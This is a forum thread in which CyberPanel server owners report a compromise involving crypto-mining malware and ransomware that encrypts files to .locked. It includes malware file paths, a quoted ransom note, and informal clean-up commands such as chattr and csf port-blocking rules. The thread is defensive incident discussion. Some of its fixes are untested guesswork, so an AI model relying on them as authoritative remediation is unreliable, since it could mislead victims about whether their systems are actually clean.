I think my provider solved the SSH issue because I can access it normally now.
I’m with Verpex.
2 Likes
In my case the binary was called bash3, and I found it too late after it had already encrypted nearly the whole server.
The other files were not present.
I killed it and will investigate tomorrow through a rescue console, without starting the server.
1 Like
Is your websites working all now?
I still cant login via SSH. I am on Hetzner cloud
1 Like
With your help I managed to delete the file /usr/lib/secure/udiskssd.
However, I can’t get hold of the file /var/spool/cron/root to repair crontab. Any help please?
1 Like
My websites always worked. It was “just” the email accounts, cyberpanel and SSH that didn’t work. Now, the SSH is working and I have removed 1 file that was malicious. Scanned the entire thing and nothing new found. The mail-accounts and cyberpanel still doesn’t work…
Run
chattr -ia /var/spool/cron/root
1 Like
I’ve created this for kinsing clean-up. Haven’t tested it, need access to an infected machine to test it out completely.
2 Likes
Create a shell script and run it on your cron job every minute.
This will reduce the load on your CPU. After that, just restart the services that are down. If your ssh doesn’t open, try changing the ssh port through the panel. It will start working again.
This is a temporary solution… it is recommended that you restore the backup on a server with a clean installation… see the shell script below.
1 Like
All my files have been encrypted. My database too.
There are some README files asking for money
What can I do?
2 Likes
This is insane. It started on my both servers yesterday, around this exactly time. Decided to reinstall everything and restore my websites, change all passwords etc. Well, crazy…
1 Like
For my My Server is not even Turning on anymore it not even rebooting lol… It like freezed
2 Likes
@gringofrijolero I believe your problem is something else… since the problem everyone is having is with miners, no case of encrypted data…
Is it possible to prevent the infection from reaching non-infected servers? For example by stopping the lscpd service?
@plumcake apparently it only affected those who use the version v2.3.6 .
I know some people with servers on older versions and they haven’t had any problems, but I can’t tell you if they’re safe.
I also can’t tell you if we should update to the latest version released today, since there’s no information about the problem in the update information.
1 Like
I don’t think so.
lscpd was used to gain access and once they get access, they may not necessarily need lscpd (depending on the exploit) but it’s a good measure.
I blocked all access to 7080, 8090 and then started cleaning up
1 Like
My little idea after reinstall from yesterdays backup and doing upgrade was to block access to port 8090 and port 7080 with csf
I add to csf.allow:
tcp|in|d=8090|s=1.2.3.4
tcp|in|d=7080|s=1.2.3.4
(1.2.3.4 means your own IP)
and removed any Port 8090 and 7080 from csf.conf
Its not 100% but maybe a little help
I had 7 infected servers. And one is infected by that encryption trojaner with .locked files 
Very stupid ppl who kills tthe system by locking system files…
1 Like
We have several servers hit with the mining malware and were able to clean, but we also had 2 sites with all the files encrypted and extension was .locked.
All occurred last night.
Was able to resolve with backups from previous night.
I think it’s related somehow, if not directly maybe another took advantage of the compromised machines.
1 Like
Hello community.
First of all I want to make it clear that I am a noob. I have been affected by this and my news website is down. I have a backup from 10/22. According to Hostinger I need to restore it and update Cyber Panel. What I want to know is if there is a possibility to repair everything without losing everything published after 10/22 or if it is no longer possible and all this will be lost. Thank you very much in advance.
Same for me!
Found that “nice” message on my server:
prepare 1 btc .contact email:[email protected],if you can’t contact my email, please contact some data recovery company(suggest taobao.com), may they can contact to me .your id: